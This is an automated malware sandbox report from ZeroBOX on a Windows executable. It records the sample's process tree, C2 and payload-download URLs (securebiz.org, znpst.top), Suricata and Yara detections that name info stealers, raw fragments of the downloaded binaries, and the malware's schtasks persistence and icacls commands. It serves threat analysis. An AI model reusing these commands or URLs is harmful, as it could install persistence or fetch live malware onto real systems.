Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 28, 2021, 1:45 p.m.	Sept. 28, 2021, 1:58 p.m.

Size	804.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`6bacb42179eb54d6afac2664cd0227d7`
SHA256	`d87865909f5bfd462d0f0a5110e0bb7c9a1a177ece1cb90c9755263a285949d9`
CRC32	`6EFE8E7C`
ssdeep	`24576:QN5sQXdZD4UjBEk/xf3P86KgVNgE5p4sJXuO:QPdZDxBLn86KAbhJ`
PDB Path	C:\nigupitufo.pdb
Yara	PE_Header_Zero - PE File Signature OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library IsPE32 - (no description)

build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
2428
- build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
  2084
  - icacls.exe icacls "C:\Users\test22\AppData\Local\21585839-4b77-4562-86c9-65f44326d70f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    2324
  - build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
    1760
    - build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
      2420
      - build2.exe "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe"
        2620
        
        build2.exe "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe"
        1868
      - build3.exe "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe"
        2076
        
        build3.exe "C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe"
        2236
        
        schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
        3020

Name	Response	Post-Analysis Lookup
api.2ip.ua	A 77.123.139.190	77.123.139.190
mas.to	A 88.99.75.82	88.99.75.82
znpst.top	A 118.33.109.122 A 210.182.29.70 A 14.51.96.70 A 211.229.47.232 A 210.92.250.133 A 211.119.84.111 A 81.16.119.135 A 211.119.84.112 A 218.38.155.210 A 203.228.9.102	14.51.96.70
securebiz.org	A 115.88.24.202 A 190.218.32.60 A 179.52.22.168 A 211.169.6.249 A 61.98.7.133 A 61.255.185.201 A 175.117.131.127 A 115.91.207.131 A 113.11.118.155 A 190.141.222.206	222.236.49.124

IP Address	Status	Action
164.124.101.2	Active	Moloch
179.52.22.168	Active	Moloch
211.119.84.112	Active	Moloch
77.123.139.190	Active	Moloch
88.99.75.82	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 77.123.139.190:443 -> 192.168.56.101:49205	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
UDP 192.168.56.101:61479 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49213 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 77.123.139.190:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49203 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 77.123.139.190:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49213 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 77.123.139.190:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49204 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
UDP 192.168.56.101:59369 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 77.123.139.190:443 -> 192.168.56.101:49215	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 88.99.75.82:443 -> 192.168.56.101:49229	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49214 -> 77.123.139.190:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49218 -> 211.119.84.112:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.101:49218 -> 211.119.84.112:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.101:49214 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 211.119.84.112:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.101:49218 -> 211.119.84.112:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.101:49219 -> 179.52.22.168:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.101:49219 -> 179.52.22.168:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 211.119.84.112:80 -> 192.168.56.101:49218	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 211.119.84.112:80 -> 192.168.56.101:49218	2023464	ET HUNTING Possible EXE Download From Suspicious TLD	Misc activity
TCP 179.52.22.168:80 -> 192.168.56.101:49219	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49228 -> 88.99.75.82:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.101:55450 -> 8.8.8.8:53	2027757	ET DNS Query for .to TLD	Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 88.99.75.82:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49214 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 77.123.139.190:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 28, 2021, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 28, 2021, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 28, 2021, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 28, 2021, 1:46 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 28, 2021, 1:46 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 28, 2021, 1:45 p.m.			0	0
IsDebuggerPresent Sept. 28, 2021, 1:46 p.m.			0	0
IsDebuggerPresent Sept. 28, 2021, 1:46 p.m.			0	0
IsDebuggerPresent Sept. 28, 2021, 1:46 p.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 28, 2021, 1:46 p.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1	0

This executable has a PDB path (1 event)

pdb_path

C:\nigupitufo.pdb

The file contains an unknown PE resource name possibly indicative of a packer (3 events)

resource name	AFX_DIALOG_LAYOUT
resource name	PAMIFEGIHURULUFUKIYUVUWOGULOJOK
resource name	None

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 28, 2021, 1:46 p.m.	stacktrace: exception.instruction_r: 8a 08 40 3a cb 75 f9 2b c2 50 56 b9 5c 10 4d 00 exception.symbol: build2+0x106e0 exception.instruction: mov cl, byte ptr [eax] exception.module: build2.exe exception.exception_code: 0xc0000005 exception.offset: 67296 exception.address: 0x4106e0 registers.esp: 1637032 registers.edi: 0 registers.eax: 0 registers.ebp: 16 registers.edx: 1 registers.ebx: 0 registers.esi: 0 registers.ecx: 1637060	1	0	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (3 events)

request	GET http://securebiz.org/fhsgtsspen6/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true
request	GET http://znpst.top/dl/build2.exe
request	GET http://securebiz.org/files/1/build3.exe

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

znpst.top

description

Generic top level domain TLD

Allocates read-write-execute memory (usually to unpack itself) (9 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 28, 2021, 1:45 p.m.	process_identifier: 2428 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 593920 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04480000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 28, 2021, 1:45 p.m.	process_identifier: 2428 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 1760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 593920 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02c20000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 1760 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04550000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2420 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72732000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2620 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 503808 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cda000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2620 region_size: 868352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02dc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 65536 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0338e000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2076 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Foreign language identified in PE resource (6 events)

name

AFX_DIALOG_LAYOUT

language

LANG_MONGOLIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x027fffe8

size

0x00000002

name

PAMIFEGIHURULUFUKIYUVUWOGULOJOK

language

LANG_MONGOLIAN

filetype

ASCII text, with very long lines, with no line terminators

sublanguage

SUBLANG_DEFAULT

offset

0x027ff860

size

0x000006f0

name

RT_ACCELERATOR

language

LANG_MONGOLIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x027fff50

size

0x00000078

name

RT_VERSION

language

LANG_MONGOLIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x027ffff0

size

0x00000130

name

None

language

LANG_MONGOLIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x027fffd8

size

0x0000000a

name

None

language

LANG_MONGOLIAN

filetype

data

sublanguage

SUBLANG_DEFAULT

offset

0x027fffd8

size

0x0000000a

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
file	C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe
file	C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build3.exe
file	C:\Users\test22\AppData\Local\acb649b3-dd0c-45ef-9056-9ce20693173f\build2.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 28, 2021, 1:46 p.m.	thread_identifier: 2764 thread_handle: 0x000000ac process_identifier: 3020 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1	0

An executable file was downloaded by the process build.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Sept. 28, 2021, 1:46 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $*¾8(nßV{nßV{nßV{©ý{EßV{©È{~ßV{©ü{ ßV{g§Å{kßV{nßW{ßV{©ù{oßV{©Ì{oßV{©Ë{oßV{RichnßV{PEL~p_à Ô}` @ ñp¬<@~HE~0 ¢À@ Ì.text« `.rdata. @@.data\|0¾@À.rsrcHE@~FÐ @@.reloc4~ @BÿUìQEPMQÿà AÀuÿh AEüëÇEü}ütUüRè§ÄÈÿë3Àå]ÃÌÌÌÌÌÌÌÌÌÿUìjþhBhð"@d¡PÄôSVW¡x1B1Eø3ÅPEðd£èYÇEüEPè9ÄEäÇEüþÿÿÿèëèPÃEäMðd Y_^[å]ÃÌÌÌÌÌÌÌÌÌÌÿUìì¡è.¾Pÿè AEø ä.¾Qÿè AEðUð;UørEð+EøÀøs3ÀéùjMøQè¡%ÄEôUð+UøÂ9Uô¬}ôsEôEèëÇEèMôMèMìUì;Uôr"j}h<¢AjEìPMøQèJÄEü}üu:UôÂUìEì;Eôr%hh<¢AjMìQUøRèÄEü}üu3ÀëQEð+EøÁøMüUðEüEøMøQÿä A£è.¾URÿä AMðUðÂUðEðPÿä A£ä.¾Eå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿUìEPè"þÿÿÄ÷ØÀ÷Øè]ÃÌÌÌÌÿUìQhÌh<¢Ajjj èÄEüEüPÿä A£è.¾ è.¾ ä.¾}üu¸ëUüÇ3Àå]ÃÌÌÌÌÌÌÌÌÿUììDÇEØ3ÀEÜEàEäEèEìEðEôMØMø3Ò}ÂUÔ}Ôu!h<£AjhhØ¢AjèÚ9ÄøuÌ}Ôu1è ÇjhhØ¢Ah´¢Ah<£AèÅ7ÄÈÿé¸}t}u ÇEÌëÇEÌMÌMÐ}Ðu!hp¢AjhhØ¢AjèZ9ÄøuÌ}Ðu1è ÇjhhØ¢Ah´¢Ahp¢AèE7ÄÈÿé8EøÇ@BMøUQEøM}ÿÿÿ?vUøÇBÿÿÿëEÑàMøAUREPMQUøRÿUÄEü}uEüéÖ}ü¬EøHéMÈUøEÈB}È\|!MøÆ3À%ÿEÄMøÂEøëMøQjè·3ÄEÄ}ÄÿtYUøBèEÀMøUÀQ}À\|"EøÆ3ÒâÿU¼EøÁUø ëEøPjèc3ÄE¼}¼ÿtEüë 3ÉUEfLPþMøy}¸þÿÿÿëÈÿå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿUììEPMQUREPMQhpQ@èzýÿÿÄEü}ü} ÇEøÿÿÿÿëUüUøEøå]ÃÌÌÌÌÌÌÌÌÿUìì,ÇEüÿÿÿÿÇEø3À}ÀEô}ôu!hÔ£Ajh9hØ¢Ajè@7ÄøuÌ}ôu1èìÇjh9hØ¢Ahô£AhÔ£Aè+5ÄÈÿé&}u}u }u3Àé }t}v ÇEèëÇEèUèUð}ðu!h£Ajh?hØ¢Ajè§6ÄøuÌ}ðu1èSÇjh?hØ¢Ahô£Ah£Aè4ÄÈÿéM;M½èUøEPMQUREÀPMQhpc@èüÿÿÄEü}üþ}ÿt^}ÿÿÿtUUÂ;UsJEÀM+È9 1Bs1BUäëEÀM+ÈMäUäÑâRhþEMTARèßKÄèw8"u èmMøÈÿéÆëcèYUøEPMQUREPMQhpc@èFûÿÿÄEü3ÒEMfTAþ}üþu"}ÿuè8"u èUøÈÿéa}üÛ3ÀMf}ÿtJ}ÿÿÿtA}v;Uê91Bs ¡1BEàë MéMàUàÑâRhþEÀPèüJÄ}üþux3Ét ÇEÜëÇEÜUÜUì}ìu!h`£AjhfhØ¢Ajè4ÄøuÌ}ìu1èGÇ"jhfhØ¢Ahô£Ah`£Aè2ÄÈÿéÈÿë\|}ÿt^}ÿÿÿtUMüÁ;MsJUüÂE+Â91Bs 1BMØëUüÂE+ÂEØMØÑáQhþUüELPQèJÄ}ü} ÇEÔÿÿÿÿëUüUÔEÔå]ÃÌÌÌÌÌÌÿUìEPjMQUREPMQè0üÿÿÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÿUìQjjjEPMQèwÄEüEüå]ÃÌÌÌÌÌÌÌÌÌÌÿUìèF]è]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿUìjþh°Bhð"@d¡PÄSVW¡x1B1Eø3ÅPEðd£eèÇEE Pÿð A=ü.¾ujjjjÿì AèEèvsÀu jèKÄèÓlÀu jè8ÄjèÞ-ÄèækÇEüèÊgÀ} jèßÄÿ4 A£ø.¾è¬f£ëIèbÀ} jè·Äè_`À} j è¤ÄjèzÄE}tMQèÄè]_EUÌât ·EÐEëÇE MQURjh@èþxE}u EPè¼è÷ÇEüþÿÿÿë?MìEMìQURè\ÄÃeèEE}u MQèèÖÇEüþÿÿÿEMðd Y_^[å]ÃÌÌÌÌÌÌÌÌÌÌÿUì=ëIuèMrEPèärÄhÿèWÄ]ÃÌÌÿUììÇEü@Eü·ùMZt3ÀëIUüEüB<EøMø9PEt3Àë.Uø·B=t3ÀëMøytw3ÀëUø3ÀºèÀå]ÃÌÌÿUìVèÕMURèÄðè request_handle: 0x00cc0010	1	1	0
InternetReadFile Sept. 28, 2021, 1:46 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $0a5Xt[t[t[jRÎa[jRØ[jRßL[SÆ s[tZå[jRÑu[jRÏu[jRÊu[Richt[PEL7ÉÚ^à ú¬âÀ@ðäâU`P@ãðV ã4`@.textpùú `.rdataþ@@.data8à°@À.rsrcðV@ãX¢@@.reloc@ ãBú@BÿUìQEPMQÿBÀuÿBEüëÇEü}ütUüRèg3ÄÈÿë3Àå]ÃÌÌÌÌÌÌÌÌÌÿUìQMüMüèOEàtMüQè~ÄEüå]ÂÌÌÿUììMøEøÇBM9tJUPèé6ÄÀEüMüQèwÄUøBEøxtMREüPMøQRèÏ3Äë EøÇ@MøÇAEøå]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÿUììMøEøÇBMøUBAMøytaUztLEHQèB6ÄÀEüUüRèÐÄMøAUøztEHQUüREøHQè'3Äë UøÇBëEøMQPEøå]ÂÌÿUìQMüEüÇBMüytUüBPè9Äå]ÃÌÌÿUìQMüEüxt MüAëë¸Bå]ÃÌÌÌÌÌÌÌÌÌÌÌÿUìjEPè Ä]ÃÌÌÌÌÌÌÌÌÌÌÌÿUìQjjj¡¾CPMQè¥ÄEüEüå]ÃÌÌÌÌÌÌÌÌÿUì=´¾CujEPMQURh²BèÄëëjEPMQURjèÄ]ÃÌÌÌÌÌÌÌÌÌÿUìjÿhÈBd¡PìlVW¡¨²B3ÅPEôd£EPMÐèëÇEü}tMU3À}ÀEÀ}ÀuhxBjj^hBjè?@ÄøuÌ}ÀuNè1Çjj^hBhBhxBèM>ÄÇE´ÇE¸ÇEüÿÿÿÿMÐè=E´U¸é<}t}\|}$~ ÇE ëÇE U U¼}¼uh°Bjj_hBjè?ÄøuÌ}¼uNè{0Çjj_hBhBh°Bè=ÄÇE¬ÇE°ÇEüÿÿÿÿMÐèE¬U°éMMðÇEÄÇEÈUðEãMðÁMðMÐèÀt0MÐèº¬~MÐèvPj¶EãPèù;ÄEëj¶MãQMÐèRPè,;ÄE}tUðEãMðÁMðë¾Uãú-uEÈEMðUãEðÀEðë¾Mãù+uUðEãMðÁMð}u8¾Uãú0t ÇE ë&Eð¾ùxtUð¾øXu ÇEëÇE}u9¾Mãù0u0Uð¾øxtMð¾úXuEðÀEðMðUãEðÀEðERPjÿjÿè²GEäUèj¶MãQMÐèMPè':ÄÀt¾Uãê0UìëTh¶EãPMÐè"Pèü9ÄÀt0¾Mãùa\|¾Uãúz¾Eãè Eë¾MãMUê7UìëéµEì;Eré¨MÉMUÈ;UèrLwEÄ;EärBMÄ;Mäu^UÈ;UèuVuì3ÿERPjÿjÿèdFu}EUE;Ew.rM;Mw$ERPUÈREÄPèóEMì3öÁÖEÄUÈëUÊU}uëEðMãUðÂUðéÏþÿÿEðèEðMáu}tUUðÇEÄÇEÈéEàu:Máu{Uât}Èw!r}ÄwEàuZ}ÈÿÿÿrQw}ÄÿvIè$-Ç"MátÇEÄÿÿÿÿÇEÈÿÿÿÿë&UâtÇEÄÇEÈëÇEÄÿÿÿÿÇEÈÿÿÿ}tEMðUâtEÄ÷ØMÈÑ÷ÙEÄMÈUÄU¤EÈE¨ÇEüÿÿÿÿMÐèüE¤U¨Môd Y_^å]ÃÌÌÌÌÌÿUìQMüEüÆ@}¦èYMüAUüBMüPlEüHUüAhBMü;²BtEüHQp#Ð·Bu è5MüUüB;Ø¶BtMüQBp#Ð·BuèBEMüAUüBHpáuUüBHpÉUüBHpMüÆAëUJUüJEüå]ÂÌÌÌÌÌÌÌÿUìQMüEü¶HÉtUüBHpáýUüBHpå]ÃÌÌÌÿUìQMüEüå]ÃÿUìjþhBh@v@d¡PÄôSVW¡¨²B1Eø3ÅPEðd£}uéjè¬\ÄÇEüEè EäMäQâÿÿútAEäxt8MäQâÿÿút'EäxthBjj4hBjèÐ9ÄøuÌUäBPMQèÄÇEüþÿÿÿèëjè_\ÄÃMðd Y_^[å]ÃÌÌÌÌÌÌÌÌÌÿUììDEPMØèÜýÿÿ3É}ÁMÔ}ÔuhxBjj7h`BjèE9ÄøuÌ}Ôu;è!Çjj7h`BhPBhxBèS7ÄÙîÝ]ÈMØèSþÿÿÝEÈé§MØèsþÿÿÀt2MØègþÿÿ¸¬~MØèTþÿÿPjM¶RèÕ5ÄE¼ëjE¶QMØè,þÿÿPè5ÄE¼}¼tUÂUëMØèþÿÿPjjEPè©,ÄPMQUèRèh]ÄÝ@Ý]ÀMØè§ýÿÿÝEÀå]ÃÿUìjEPèÀþÿÿÄ]ÃÌÌÌÌÌÌÌÌÌÌÌÿUìQMüEüÇÀBMüQèUoÄå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿUìQMüMüè¿ÿÿÿEàtMüQènýÿÿÄEüå]ÂÌÌÿUìQMüEüÀ PMÁ QèpÄ÷ØÀÀå]ÂÌÌÌÌÿUìèqè]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿUìjþh(Bh@v@d¡PÄSVW¡¨ request_handle: 0x00cc0010	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00092600', u'virtual_address': u'0x00025000', u'entropy': 7.991525942094955, u'name': u'.data', u'virtual_size': u'0x027d7824'}

entropy

7.99152594209

description

A section with a high entropy has been found

entropy

0.729140722291

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://www.openssl.org/support/faq.html

Yara rule detected in process memory (50 out of 58 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Win32 PWS Loki	rule	Win32_PWS_Loki_Zero
description	Win.Trojan.agentTesla	rule	Win_Trojan_agentTesla_Zero
description	Take ScreenShot	rule	ScreenShot
description	browser info stealer	rule	infoStealer_browser_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"

Allocates execute permission to another process indicative of possible code injection (4 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 28, 2021, 1:45 p.m.	process_identifier: 2084 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2420 region_size: 1273856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 1868 region_size: 880640 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1
NtAllocateVirtualMemory Sept. 28, 2021, 1:46 p.m.	process_identifier: 2236 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000080	1

Installs itself for autorun at Windows startup (1 event)

reg_key

